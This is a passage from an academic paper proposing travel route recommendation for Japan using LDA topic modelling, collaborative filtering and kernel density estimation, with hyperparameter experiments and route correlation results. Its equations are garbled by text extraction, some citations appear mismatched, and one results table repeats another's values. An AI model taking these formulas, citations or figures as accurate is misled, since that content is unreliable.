the user through collecting the user's needs, and then modify and adjust by communicating with the customer. The problem that this brings is that the customer manager needs to compare information such as users’ needs, travel price, travel time, travel transportation, and scenic spot arrangements when planning numerous travel routes. Obviously, the traditional methods have significant disadvantages such as low efficiency and long time-consuming. Bring a great burden to the staff and it is incompatible with the development of the current industry. In order to solve the above problems, we put the historical travel routes collected as data sets in the paper, and a travel route recommendation and generation algorithm based on LDA and collaborative filtering is designed. Reasonable city recommendation list and playing time are the basis and focus of route planning. The paper is based on the many shortcomings in the traditional travel route planning method, and takes the city's recommendation and time planning as the main focuses on work. In this work, different recommendation algorithms were designed, including a recommendation algorithm based on Latent Dirichlet Allocation (LDA) and collaborative filtering. By analyzing the performance of the recommendation algorithm on the data sets, the recommendation algorithm is improved and optimized. The LDA algorithm based on KDE (Kernel Density Estimation) and classification, the collaborative filtering algorithm based on KDE and classification. The final experimental results show that the optimal city list and travel time generated by the recommended algorithm are more reasonable and satisfy the actual use of the user. Keywords-LDA Model; Collaborative Filtering; KDE Algorithm; Recommended Algorithm; Machine Learning I. INTRODUCTION Tourism industry has become an important part of national economy within the rapid development of China's national economy in these years, and the number of travelers has also been gradually increasing. According to the data shown by National Bureau of Statistics, the consumption brought by tourism has also increased year by year. The tourism industry has shown an accelerated convergence of online and offline. Traditional travel agencies have been unable to meet consumers’ need and development of modern tourism. Based on the above situation, the online development mode of tourism has become a research hotspot in academia and industry. At present, the development carrier of online tourism is mainly online travel websites DOI: 10.21307/ijanmc-2019-021 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 48 (such as: tuniu.com, tongcheng.com, etc.). The traditional travel website was designed by B/S mode [1], which can provide consumers with a large amount of tourist information, however, the travel route displayed on the website is manually planned by sales account manager after collecting users’ requirements. Therefore, this has created two problems. On the one hand, the traditional method of artificially planning travel routes has low productivity and cannot meet the development of tourism. So how to automatically generate a reasonable travel route with intelligent algorithms according to users’ needs has become an urgent problem to be solved. On the other hand, traditional travel routes can no longer meet the individual needs of each user, so how to reduce the blindness and randomness of route arrangement, then provide customers with personalized travel routes, thus providing more travel options for users to choose has gradually become a research hotspot of relevant enterprises and disciplines. In recent years, algorithms for travel route generation, LDA, and collaborative filtering have been reported many times. Ma Zhangbao et al. [2], who began with the space decision-making of tourism travel, studied methods and techniques of the tourism travel decision support system, and then proposed the operational model of travel combining space and time and the LBS model of tourism travel route. However, the model proposed in their paper focuses on querying attractions and hotels based on space, time and location service, and then provide users with query service of the optimal destination as well as the scheme to arrive at destination. But this way can not generate a complete travel route according to the user's demand; it was not suitable for applying in the actual context. Jin Baohui et al. [3] designed a travel route choice model based on Regret Theory and figured out the deficiency of Expect Utility Theory and Prospect Theory via comparison, and then proposed a simpler travel route choice model. This paper focuses on description of tourists’ behavior in selecting routes, and then presents a selection model for tourists under uncertain conditions. It didn’t do comprehensive comparison and sorting for travel routes, even didn’t discuss about actual problems. Also, travel information provided by online travel sites, which provides big data source, were totally ignored in their work. Chunjing Xiao, et al. has proposed a travel route recommendation method based on dynamic clustering. This method firstly analyzes different characteristics of tourism data and other standard data. Secondly, it uses the variable long time window obtained by dynamic clustering to divide the tourist interaction history. The potential Dirichlet distribution (LDA) is used to extract probability topic distribution of each stage, and the user interest drift model is established by combining the time penalty weights. Finally, the route recommendation is completed according to the candidate topic and probability topic relevance of tourists [4]. Although this method has good recommendation accuracy, it focuses on recommending possible routes for users under the premise of there are some user interest sets and numerous travel routes, at the same time, it does not focus on the study of travel route generation. Wang Hui et al. has proposed the solution of ant colony algorithm in the application of travel route planning, they discussed the application in vehicle routing problem based on ant colony algorithm and completed the travel of 201 5A scenic spots in the country that using the shortest time. However, this paper does not study the planning and generation of travel routes that meet needs according to user's preference conditions [5]. HOU Le [6] et al. has proposed an optimization algorithm based on iterated local search (ILS) and cuckoo search (CS). This algorithm firstly uses ILS to solve tourist attractions and initial travel routes. Then, the CS algorithm is used to minimize time cost of travel route while satisfying both the time window constraint of tourist attraction and the total number of attractions. The main problem solved by the algorithm is a complete route of the shortest travel time required given the tourist attractions. The research focuses on minimizing the time of travel routes; in the meanwhile, it has not completed research from city list generation to the development of route plan. Research and application of recommendation algorithms such as collaborative filtering and LDA (Latent Dirichlet allocation) are reported at home and abroad. Yajun L [7] and others wrote a review of collaborative filtering recommendation techniques. In this paper，what they have International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 49 done were summarized and compared the collaborative filtering algorithms. This paper reviews the related research of collaborative filtering. Firstly, it expounds the connotation of collaborative filtering and its main situation, including sparsity, multi-content and scalability, and then detail the solutions for domestic and foreign scholars. This article is very helpful for the study and research of collaborative filtering algorithms. Qiang C, et al. has proposed a recommendation algorithm based on label and collaborative filtering. The label is used as information embodying user interest preferences and resource characteristics. The user and resource tag feature vectors are generated based on the multi-dimensional relationship between users, tags and resources. Finally, based on prediction preferences, sorting values will produces Top-N recommendations. Then the collaborative filtering algorithm is applied to the recommendation of personalized resources [8]. One of the most successful applications of collaborative filtering algorithms in foreign countries is the Amazon online website. Amazon's G Linden [9] and others proposed an item-based collaborative filtering algorithm, which is well suited for comparing similar items rather than comparing similar users. The number of items is much larger than the actual number of users, resulting in high quality recommendations. Regarding the LDA algorithm, DM Blei et al. [10] proposed a three-level hierarchical Bayesian model in 2003, and proposed an efficient approximate reasoning technique based on variational method and an EM algorithm for empirical Bayesian parameter estimation. The LDA algorithm was successfully applied to the fields of text modeling, text categorization, topic extraction, etc., and mixed with unigrams and probabilistic LSI models. R Krestel et al. [11] successfully applied the LDA algorithm to the field of tag recommendation. They used the LDA algorithm to mine the user tags under the same theme, and then recommended the new tags to the user as a search condition, which improved the search efficiency. From the current research status at home and abroad, there is no relevant scholars and enterprises can provide a feasible and accurate method to meet actual requirements. The current research results focus on the recommended method of designing travel routes under the premise of mastering user information and historical route data, which is, recommending the travel route in historical routes through user's historical information, so for the new user's demand, it can't generate a new route that meets the user's needs. At the same time, through the learning and researching for collaborative filtering and LDA algorithm, it is found that these algorithms are feasible and applied in this paper. According to that, we will show the method of recommendation and generation of tourist routes based on LDA and collaborative filtering below. II. RELATED WORK The planning of a travel route is a complex and comprehensive process that requires consideration of many factors, such as user’s demand, the price of route, interest arrangement, and transportation. The basic theory of route planning and generation involves multiple disciplines, including data mining, statistical machine learning, network search, pattern recognition, and spatial data mining. A scientific travel route can display as many tourist attractions and landscapes as possible to visitors, thereby improving satisfaction and happiness of tourists and promoting the long-term development of tourism industry. In recent years, with the rapid development of artificial intelligence technology, route planning algorithms such as genetic algorithm, particle swarm optimization algorithm, simulated annealing algorithm, ant colony algorithm and immune algorithm have been emerged. The planning and generation of a travel route mainly involves generating recommended city according to user's needs, and reasonably planning the playing time of recommended city. This paper takes the collected historical travel route datasets of Japan as researching object, mainly studies the recommendation and generation scheme of travel city time-space list in the travel route planning. It is proposed to use LDA and collaborative filtering to design the travel city recommendation algorithm, using KDE algorithm to optimize the playing time of each city, and then generate a time-space list of user's playing city. In the experimental part, the results of topic city model based LDA and different International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 50 travel route recommendation algorithms are introduced in detail. The relevant city error rate of topic city model based LDA under different parameters is compared and the optimal model parameters are obtained. Finally, the performance of different recommendation algorithms is evaluated and analyzed. III. TRAVEL ROUTE RECOMMENDATION AND GENERATION SYSTEM The travel route recommendation algorithm based on KDE and classification mainly includes three modules. They are data preprocessing and feature extraction module, playing time estimation module based on KDE, topic city generation module based on LDA and travel route generation module or recommended city generation module based on collaborative filtering. The data preprocessing and feature extraction module mainly transforms the original data set into a travel route text set through operations such as data cleaning, classification and feature extraction, that is, it conforms to the input format of LDA model, such as the document-content distribution format. The original data set comes from the travel historical data set of Japan, and there are about 5,000 travel routes. The playing time estimation module based on KDE mainly uses the KDE algorithm to calculate users’ total playing time and the playing time of input cities, improving the accuracy of the playing time and the quality of recommended algorithm. The topic city generation module based on LDA is the core module of entire algorithm. In this module, the topic-probability distribution under the travel route text and the characteristic city probability distribution under each topic are calculated through established travel city topic model based on LDA. In turn, the probability distribution of characteristic cities is converted into a list of recommended cities. The topic city generation module based on collaborative filtering is also the core module of entire algorithm. In this module, the list of recommended cities satisfying conditions is calculated through the collaborative filtering algorithm. The travel route generation module is the total output module of algorithm. After processing the output result of previous module, a complete travel route is finally formed, including users’ total playing time, the list of travel cities, and the list of playing time of each city. The system structure of algorithm is shown in Figure 1 and Figure 2. Figure 1. LDA travel route recommendation algorithm based on KDE and classification International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 51 Figure 2. Collaborative filtering travel route recommendation algorithm based on KDE and Classification A. Data Preprocessing and Feature Extraction Module Data preprocessing is basis for algorithm to get good training and output results. In the data cleaning and preprocessing module, feature extraction and data classification are mainly completed. The given original data set is mainly json format travel route data. Each route is an ordered list of multiple city lists. The attributes of each city list include the city ID (id), trip name or city name (name), type, travel time (travel_times or transit_time). Data cleaning is used to extract useful feature data in the data set and complete the missing data. Then the extracted data is sorted according to specific rules, where we classify according to the number of cities of route. Finally, through data preprocessing, the data is organized into a data set that can be used as the LDA model input, such as a document-content distribution format. The specific data preprocessing steps are: 1) Reading the json data file using python code, the city name (name), travel time (travel_times), and route number (plan_id) of each route are read; 2) Calculating the number of writing for each city, the specific number of writing = the total playing time (hour) / 4; 3) Writing the extracted features into different output files according to a specific format ([number of lines, route id, city name]); 4) According to the number of cities in each route, the output will be classified according to the number of cities 4,4-5, 6-7, 8-10, 10, and stored in the corresponding files; 5) The writing of data is completed and the file is saved. Preprocessed and classified data Playing time Recommended city Data preprocessing and feature extraction Raw data dataR aw datad ata 数据 Playing time estimatio n based on KDE Topic city generatio n based on LDA Travel route generation International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 52 TABLE I. ROUTE BASIC ATTRIBUTE TABLE id name plan_id type hours daysep meaning City id City name Route id Route type Playing time The flag of end of day Value type string string string string list bool example ‘263’ ‘Osaka’ ‘3799’ ‘place’ [4.0,8.0] true B. Playing time estimation module based on KDE In general, the total time for users to play is calculated based on people's experience theoretics to formulate specific rules, for example, total hours of playing (days) = total time of playing(days) * playing time of every day (8 hours). The playing time of city that the user wants to go to is calculated by multiplying the probability of topic distribution obtained by LDA by the total playing time. In practical applications, it is found that this method does not have a certain degree of flexibility and cannot adapt to all user inputs. The resulting time error is relatively large, resulting in poor recommendation quality. Therefore, in this paper, we decided to use the KDE (Kernel Density Estimation) algorithm to estimate total time for users to play and the playing time of city that users want to go to, improving the recommendation quality. Assuming that t1 , t2 , … tn are n samples of total playing time t, and the probability density function of total playing time is ( )f t , the kernel density estimation of ( )f t is: 1 1 1 1ˆ ( ) ( )              n n i h n i i i t t f t K t t K n nh h  Where h is the bandwidth, n is the number of samples, and K () is the kernel function. The algorithm steps for playing time estimation based on KDE are: 1) According to the number of days of playing, the historical routes will be categorized into five categories: 1-3 days, 4-5 days, 6-7 days, 8-10 days and 10 days or more; 2) Determining the corresponding route data category according to the number of days of playing input by users; 3) Reading the playing time of each route of a specific category, and saving it as a list A; 4) Using list A as the input data of kernel density estimation function to obtain the kernel density estimation function; 5) Randomly sample a function value as the total time for user to play, expressed as H, according to the obtained kernel density function; 6) Repeat the above steps to obtain the list of playing time G of input cities. According to the above algorithm, we can get total time for user to play, expressed as H and the list of playing time for input cities. These two values will be used later in the topic city generation module based on LDA. C. Topic city generation module based on LDA The LDA model is a probabilistic topic model for modeling discrete data sets (such as document sets). LDA is essentially an unsupervised machine learning model that can express high-dimensional text word space as low-dimensional topic space, ignoring text-related category information. The LDA model gets a brief description of document by making topic modeling of document set, retaining the essential statistical information and helping to efficiently process large-scale document sets [12]. In general, before applying LDA model, it is necessary to satisfy the premise that the document is composed of a number of latent topics, which are composed of a number of specific words in the text, ignoring the order of words and syntactic structure in the document. For the travel route dataset of this paper, after data preprocessing and feature extraction, a document set containing discrete city names is formed. Each document is composed of a number of travel cities. There is no syntactic structure in the document, and words are not specific order. And it is in accordance with premise and data requirements of LDA model. In this paper, according to International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 53 preprocessed travel route datasets, the training set of travel routes is characterized by dimensionality reduction, and the training set is expressed as the form of topic probability, so that a specific topic city is extracted from the topic probability list to form a recommendation city list. Figure 3. Travel city topic model based on LDA Figure 3 above shows the established travel city topic model based on LDA. There are three layers in the model, followed by the document collection layer of travel city, topic layer, and characteristic city layer. The process of travel city topic model based on LDA generates a feature city as follows: 1) For topic c, a word polynomial distribution vector φ on the topic is obtained based on Dirichlet distribution Dir (β); 2) The number of words N obtained from the Poisson distribution P; 3) According to the Dirichlet distribution Dir (α), a topic distribution probability vector θ of the text is obtained; 4) For each word wｎ in the text N words: a) Polynomial distribution from θ Multinomial (θ) randomly selects a topic z; b) Select a word as w ｎ from the polynomial conditional probability distribution Multinomial(φ) of topic z. To obtain the probability distribution of a characteristic city, we need to use model parameter estimation methods to estimate word probability distribution under each topic and topic probability distribution of each text. The more commonly used parameter estimation methods are the expected propagation algorithm, variational Bayesian inference and Gibbs sampling [13] [14]. The high-efficiency Gibbs sampling method is used in this paper estimates the probability distribution of a characteristic city through the Gibbs sampling method in the case of a known travel route data text set. According to LDA model, we can get the probability of a text: 1 ( | , ) ( ) | )( ( | ) ( | , )) n N n n n zn p p p z p z d             Using the Gibbs sampling method, the topic of each word is sampled, and the parameter estimation problem can be converted into calculating the conditional probability of topic sequence under word sequence. , , , , , , 1 ( , ) ( | , ) ( ) ( , ) t k i t t i i k i kV ti k i t t np z p z k z n p z n                       International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 54 In the above expression, i z represents the topic variable corresponding to the i-th word;   i z is the i-th word is not included in the expression; t k n is the number of occurrences of the word t in the topic k is represented;  t is the prior probability of Dirichlet of the word t; and k m n represents the number of topic k in the text m.  k is the prior probability of Dirichlet of topic k. Based on the above calculation results and the topic number of each word obtained, parameters to be calculated can be calculated by the following equation: , 1 t k t k t V t k t t n n         , 1 k m k m k K k m k k n n          k , t represents the probability of word t in the topic k; ,  m k represents the probability of topic k in the text m. The input and output of travel city topic model based on LDA is shown in the following table 2: TABLE II. INPUT AND OUTPUT OF TRAVEL CITY TOPIC MODEL BASED ON LDA input：preprocessed and classified travel route text set (one route for one line) The number of topic K, hyperparameters α and β output： 1. Topic number assigned to each word of each text 2. Topic probability distribution θ for each text 3. Characteristic city probability distribution for each topic 4. Word id mapping table in the program 5.Top-N feature city words sorted from top to bottom for each topic D. Travel City Generation Module Based on Collaborative Filtering Because there are a large number of travel routes in the data set of this research, we can regard each travel route as a user before applying the collaborative filtering recommendation algorithm and consider each travel city in each route as a item. Obviously the number of items in this research is much larger than the number of users, so we use a project-based collaborative filtering recommendation algorithm. The algorithm of a travel city generation module based on collaborative filtering is divided into the following three steps: 1) Establish a route-city scoring dictionary. According to the actual situation, the score here is playing time (hours) of each city. Based on the pre-processed travel route text set, a route-city scoring dictionary was established. The key value of dictionary is the route number, value is also a dictionary, the key is the city name, and value is playing time of city. The format is as follows: Dic={‘route1’:{‘city-1’: playing time-1,‘city-2’: playtime-2,…,‘city-n’: playtime-n},‘route 2’:{‘city-1’: playtime-1,‘city-2’: playing time-2,…,‘city-n’:playing time-n},…, ‘route-n’:{‘city-1’: playtime-1,‘city-2’: playing time-2,…,‘city-n’: playing time-n}} 2) Calculating the similarity between cities and getting a list of similar cities (neighbors) in each city. In calculating similarity, we use the Euclidean distance to measure the similarity between cities; 3) Generateing a list of recommended cities. A weighted sum of all the cities in the set of city neighborhoods is obtained, and the time for the target route to all cities is International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 55 finally obtained. After playing time set is sorted, the top-N list is taken as city recommendation list. E. Travel route generation module The travel route generation module is an integrated module and an output module of the entire algorithm. Through playing time estimation module based on KDE, the total time for users to play H and the playing time list G for input cities can be obtained.The topic city generation module based on the LDA can be used to get the probabilistic distribution of characteristic city—recommended cities list. We need to normalize the probability of extracted topical city, find out playing time of recommended city based on processed probability value, and finally form a complete travel route. The main process of travel route generation module is as follows: a. rest ← H – sum(G) #Calculating total playing time of recommended cities list b. sum_prop ← 0 #Assigning the total probability value =0 c. recom_list=get_recom() #Getting a list of recommended cities ， the form: [[city-1 ， probability value-1],[city2，probability value-2],…] d. trip_list ← null #Assigning the route list to null e. for i←0 to size(Recommended city list size) do sum_prop←sum_prop+ recom_list [i][1] repeat f. for i←0 to size(Recommended city list size) do recom_list [i][1]←recom_list [i][1]/sum_prop * rest repeat g. for i←0 to size(Recommended city list size) do trip_list [i]←recom_list [i] repeat h. Add the list of cities entered by the user and their playing time to trip_list i. return trip_list Through the travel route generation module, you can get a complete travel route. The specific route format is [[city-1, playing time-1], [city-2, playing time-2]… [city-n, playing time-n]]. IV. THE RESULT AND ANALYSIS OF EXPERIMENT The evaluation of experimental results is an important work, this chapter mainly shows and evaluates the experimental results of different recommended algorithms, including the results of the topic city generation based on LDA, the results of the LDA travel route recommendation algorithm based on KDE and classification, the results of the collaborative filtering travel route recommendation algorithm based on KDE and classification, The performance of different travel route recommendation and generation algorithms based on LDA and the relevant city error rate are compared under different parameters. In recommendation field, commonly used evaluation indicators include recall rate and precision rate [15][16]. Generally, the accuracy of the recommended algorithm is evaluated by the recall rate and precision rate. In e-commerce systems, the conceptual formulas for recall rate and precision rate are as follows [17]: Precision rate = the number of items user likes / the number of items recommended by the system; Recall rate = the number of all user's favorite items in the recommended list / the number of all user's favorite items in the system Based on the concept and calculation methods of precision rate and recall rate, combined with the research content of this paper, we propose two evaluation indicators of the relevant city error rate and route correlation rate, which are used to evaluate the results of topic city generation model based LDA and route generation results of recommendation algorithm respectively. In popular terms, the relevant city error rate is the probability that a tourist city is classified as a wrong topic (route). Here we use P (e) to represent, which can be calculated by the following formula: ( )  i i c p e A  In the above formula, Ci represents the number of tourist cities that are classified as the wrong topic in the probability distribution of the i-th topic, that is, in the historical routes, the city is not in the same route as any other city in the topic city. Ai represents the total number of cities in the International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 56 probability distribution of the i-th topic. Therefore, the lower the relevant city error rate, the higher the quality of the model output, the more easily accepted. In the practical application, the related city error rate is generally not more than 0.2. According to the relevant city error rate above, we can get the route correlation rate calculation method. Here, we use R (t) to represent: 2 ( ) 1  i i t R t T  In the above formula, i t represents the number of recommended cities that are classified as wrong routes in the i-th generation route, that is, in the historical routes, the city is not in the same route as any other city in the generation route. i T represents the total number of cities in the i-th generation route. Because in the recommendation process, if there are cities that have no relevance with other cities in the recommended route, it is often unacceptable. Therefore, the higher the route correlation rate, the better the performance of the route recommendation and generation algorithm, the more consistent with the user's expectations. In practical applications, the route correlation rate is generally not less than 80%. A. The evaluation of topic city generation model based LDA The value of topic K of LDA model, the number of iterations, and the hyperparameters α and β all affect the probability distribution of the final topic city. Therefore, in order to obtain the optimal topic city probability distribution, we examine the effect of probability distribution of the topic city under different parameters. In order to ensure the uniformity of the experimental premises, the sample set of all the experimental results below is a set of 8-10 tourist route texts. 1) Experimental results under different hyperparameter α We set the initial value of topic K = 50, the number of iterations: niter = 500, the hyperparameter β = 0.1, then the hyperparameter α takes 5, 10, 15, until 50. Table 3 and Figure 4 below show the experimental results for different values of hyperparameter α. From the experimental results, it can be seen that the value of the optimal hyperparameter α is 25. TABLE III. THE EXPERIMENTAL RESULTS OF DIFFERENT VALUES OF HYPERPARAMETER Α 5 10 15 20 25 30 35 40 45 50 log 4.72 4.16 4.02 3.38 3.21 3.16 3.82 4.12 4.68 5.16 p(e) 0.282 0.254 0.236 0.192 0.166 0.171 0.179 0.216 0.249 0.288 Figure 4. The experimental results of different values of hyperparameter α International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 57 2) Experimental results under different hyperparameter β We set the initial number of topic K = 50, the number of iterations: niter = 500, the hyperparameter α = 25, then the hyperparameter β takes 0.01, 0.05, 0.1, until 0.50. Table 4 and Figure 5 below show the experimental results for different values of hyperparameter β. From the experimental results, it can be seen that the value of the optimal hyperparameter β is 0.15. TABLE IV. THE EXPERIMENTAL RESULTS OF DIFFERENT VALUES OF HYPERPARAMETER Β 0.01 0.05 0.10 0.15 0.20 0.25 0.30 0.35 0.40 0.50 log 5.62 4.42 4.02 3.32 4.23 5.10 5.82 5.92 6.58 7.21 p(e) 0.282 0.254 0.236 0.172 0.198 0.216 0.232 0.299 0.328 0.356 Figure 5. The experimental results of different values of hyperparameter β 3) Experimental results under different number of topic K We set the number of iterations: niter = 500, the hyperparameter α = 25, 0.15, then the value of topic K takes 4, 6, 8, until 22. Table 5 and figure 6 below show the experimental results for different number of topic K. From the experimental results, it can be seen that the optimal number of K is 12. TABLE V. THE EXPERIMENTAL RESULTS OF DIFFERENT NUMBER OF TOPIC K k 4 6 8 10 12 14 16 18 20 22 log 5.62 4.42 4.02 3.32 3.26 5.10 5.82 5.92 6.58 7.21 p(e) 0.223 0.214 0.205 0.196 0.182 0.226 0.265 0.314 0.408 0.516 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 58 Figure 6. The experimental results of different number of topic K 4) Experimental results under different number of iterations n We set the initial number of topic K = 12, the hyperparameter α = 25, 0.15, then the number of iterations take 300,400,500, until 1200. Table 6 and figure 7 below show the experimental results for different number of iterations n. From the experimental results, it can be seen that the optimal number of iterations is 900. TABLE VI. THE EXPERIMENTAL RESULTS OF DIFFERENT NUMBER OF ITERATIONS N n 300 400 500 600 700 800 900 1000 1100 1200 log 6.15 5.86 4.02 3.98 3.82 3.64 3.12 3.31 3.41 3.53 p(e) 0.332 0.308 0.275 0.262 0.236 0.214 0.161 0.172 0.181 0.194 Figure 7. The experimental results of different number of iterations n From the above experimental results, it can be concluded that the optimal parameters of topic city generation model based LDA are k=12, hyperparameter α=25, β=0.15, and the number of iterations n=900. Under the optimal parameters, the relevant city error rate is 0.161, which is an acceptable error rate in practical applications. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 59 B. Evaluation of LDA travel route recommendation algorithm based on KDE and classification In order to reduce contingency of experimental results and improve confidence of experimental results, in the experiment evaluation of this section, we carry out the following experimental steps: 1) Randomly generating 50 groups of input city list and playing time; 2) Using the random generated input city list and playing time as input to the recommendation algorithm 3) Recording the output of algorithm obtained from 50 sets of input data, and taking the average value of relevant city error rate of 50 sets of experiments, denoted as Ei 4) Repeating the above steps (1)-(3) for 10 times to obtain the value of Ei for each time. Figure 8. The route correlation rate of LDA travel route recommendation algorithm based on KDE and classification Figure 8 shows the experimental results obtained in 10 independent experiments. It can be seen from the figure that the value of route correlation rate has been stable at around 90%, because the topic city generation model based LDA has a certain degree of randomness in generating the recommended city list, there will be irrelevant cities in the resulting travel routes. However, by observing experimental results, the route correlation rate of generated travel routes is about 90%, which is within the normal error range. Therefore, the performance of LDA travel route recommendation algorithm based on KDE and classification is relatively good, which conform to practical applications. C. Evaluation of collaborative filtering travel route recommendation algorithm based on KDE and classification In order to reduce the contingency of experimental results and improve the confidence of experimental results, in the experimental evaluation of this section, we also carry out following experimental steps: 1) Randomly generating 50 groups of input city list and playing time; 2) Using the randomly generated input city list and playing time as input to the recommendation algorithm 3) Recording the output of algorithm obtained from 50 sets of input data, and taking the average value of relevant city error rate of 50 sets of experiments, denoted as Ei 4) Repeating the above steps (1)-(3) for 10 times to obtain the value of Ei for each time. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 60 Figure 9. The route correlation rate of collaborative filtering travel route recommendation algorithm based on KDE and classification Figure 9 shows the experimental results obtained in 10 independent experiments. It can be seen from the figure that the value of the route correlation rate has been stable at around 95%, compared with experimental results of LDA travel route recommendation algorithm based on KDE and classification. The correlation rate obtained by collaborative filtering algorithm is higher, but the difference is not large. This is because the core of collaborative filtering algorithm is based on traditional statistical algorithms, and there is no randomness. The route correlation rate with an error rate of approximately 5% is due to the irrelevance of user s’ input city list.. Because in the actual application, cities list input by the user may not exist in the historical routes itself, which is due to systematic error caused by the incompleteness of historical data, which may not be considered in our experiments. D. Comparison of algorithm output results TABLE VII. THE OUTPUT RESULTS OF DIFFERENT ALGORITHM The input of algorithm total days of travel 7 cities that user wants to go Osaka, Nagoya The output of algorithm No improved LDA recommended algorithm [Naoshima: 2.5, Yamanashi: 1.8, Osaka: 56.4, Nagoya: 29.8] No improved collaborative filtering recommendation algorithm [Yakushima: 12.5, Naoshima: 8.6, Osaka: 42.8, Nagoya: 26.2] LDA travel route recommendation algorithm based on KDE and classification [Kyoto: 42.4, Nakafurano-cho: 3.9, Osaka: 15.5, Nagoya: 16.5] collaborative filtering travel route recommendation algorithm based on KDE and classification [Kyoto: 24.2, Tokyo: 20.3, Osaka: 15.5, Nagoya: 16.5] Table 7 above is results of travel route generation under different recommendation algorithms. It can be seen from experimental results that the improved travel route recommendation algorithm is significantly better than the no-improved algorithm in the playing time schedule. The playing time is more reasonable than previous algorithm. The situation that playing time is too short has reduced, reaching our expected goal. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 61 E. Summary of experimental results In order to evaluate model results and recommended algorithms, this chapter first proposed new evaluation indicator based on recall rate and precision rate realization principles, relevant city error rate and route correlation rate. Then, the influences of different number of topic K, number of iterations, the hyperparameters α and β on the LDA topic city generation model are introduced. After many experiments, the optimal model parameters are determined to be k=12, α=25, β = 0.15, niter = 900. Finally, the performance of different recommendation algorithms is evaluated. It can be seen from experimental results that collaborative filtering travel route recommendation algorithm based KDE and classification is slightly higher than the route correlation rate of LDA travel route recommendation algorithm based KDE and classification by about 5%. In the actual application process, different recommendation algorithms can be selected according to users’ actual demand. The final experimental results show that the optimization effect of proposed algorithm by using the classification method and KDE algorithm is obvious. The LDA and collaborative filtering algorithm optimized by classification method improves the route correlation rate and makes the route correlation rate indicator reach more than 90%. The KDE algorithm is used to optimize playing time, which makes playing time of cities more reasonable, which proves that the method of this paper has great reference value. V. CONCLUSION This paper proposed the travel route recommendation and generation algorithm based on LDA and collaborative filtering. The core of algorithm is LDA topic model and collaborative filtering. The LDA and collaborative filtering travel route recommendation algorithm based on KDE and classification are proposed in this paper. Although optimized algorithm designed has achieved good performance, but it still needs a lot of work to be done, including: 1) The recommendation algorithm based on LDA topic model has a certain degree of randomness in generating the recommended city list, there will be not related to the historical routes in resulting travel routes, but within the acceptable error rate. The output of recommendation algorithm based on collaborative filtering is relatively fixed and does not generate new feasible routes. And although the collaborative filtering algorithm does not have randomness problems, due to the irrelevance of user s’ input city list, a certain error rate will also occur. Therefore, we can study a method that can combine the LDA topic model and collaborative filtering algorithm to make the performance of the recommendation algorithm better. 2) So far, the hyperparameters of LDA model, such as the number of topic k, α and β, are mainly adjusted manually by empirical rules, resulting in a huge amount of experimental work. Later, we can consider some methods of adding reinforcement learning and self-game, and propose a method that can learn the optimal parameters. This is also a research hotspot in the field of machine learning in recent years. 3) Further studying the evaluation method of travel route, because the evaluation of travel route has certain subjectivity, so this brings certain difficulties to actual assessment. At present, only quantifiable indicators can be extracted to evaluate part reasonability of travel route. So evaluation indicators may not be comprehensive. Later, we can study and propose a comprehensive and reasonable evaluation method of travel route. ACKNOWLEDGEMENTS This paper is partially supported by Qinghai University Student Science and Technology Innovation Fund Project (No. 2017-QX-12); REFERENCE [1] Wohlin C, Runeson P, Höst M, et al. Experimentation in Software Engineering [J]. IEEE Transactions on Software Engineering, 2012, SE-12(7):733-743. [2] Mabao Z, Research on Methods and Techniques of Tourism Travel Decision Support System [D]., Shandong University of Science and Technology. 54-58 [3] Baohui Jin. Travel route choice model based on regret theory. COMPUTER MODELLING & NEW TECHNOLOGIES 2014 18(4) 158-163 [4] Changing X, Kewen X, Yongwei Q, et al. Tourist route recommendation based on dynamic clustering [J]. Journal of Computer Applications, 2017, 37(8):2395-2400. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.04, 2018 62 [5] Hui W, Changhua L, Yuling W ,et al. Application of ant colony optimization in Tourism Route Planning [J]. Software Guide, 2016, 15(4):144-146. [6] Hou L, Yang H, Fan Y, et al. Research on Personalized Trip Itinerary Based on ILS-CS Optimization [J]. Journal of Frontiers of Computer Science & Technology, 2016, 10(1):142-150. [7] Yajun Li ,Qing Lu, Changyong Liang .Review of Collaborative Filtering[J].Pattern Re-cognition and Artificial Intelligence,2014, 27(8):720-734. [8] Qiang C, Dongmei H , Haisheng L ,et al . Personalized resource recommendations based on tags and collaborative filtering [J].Computer Science, 2014,41(1):69-71. [9] Linden G, Smith B, York J. Amazon.com Recommendations: Item-to-Item Collaborative Filtering [J]. IEEE Internet Computing, 2003, 7(1):76-80. [10] Blei D M, Ng A Y, Jordan M I. Latent dirichlet allocation [J]. Journal of Machine Learning Research, 2008, 3:993-1022. [11] Krestel R, Fankhauser P, Nejdl W. Latent dirichlet allocation for tag recommendation[C].ACM Conference on Recommender Systems, Recsys 2009, New York, Ny, Usa, October. DBLP, 2009:61-68. [12] Epanechnikov V A. Non-Parametric Estimation of a Multivariate Probability Density [J]. Theory of Probability & Its Applications, 2006, 14(1):153-158. [13] Friedman N, Dan G, Goldszmidt M. Bayesian Network Classifiers [J]. Machine Learning, 1997, 29(2-3):131-163. [14] Heinrich G. Parameter Estimation for Text Analysis[J]. Technical Report, 2008. [15] Billsus D, Pazzani M J. Learning Collaborative Information Filters.[C]//Proceedings of the 15th National Conference on Artificial Intelligence (AAAI1998). San Francisco: AAAI Press, 1998: 46-54. [16] BASU C, HIRSH H, and COHEN W. Recommendation as classification: using social and content-based information in recommendation[C]//Proceedings of the 15th National Conference on Artificial Intelligence. San Francisco: AAAI Press, 1998: 714-720. [17] Yang S H, Long B, Smola A J, et al. Collaborative competitive filtering:learning recommender using context of user choice[C]// International ACM SIGIR Conference on Research and Development in Information Retrieval. ACM, 2011:295-304. [18] George G, Haas M R, Pentland A. Big Data and Management: From the Editors [J]. Academy of Management Journal, 2014, 57(2):321-326. 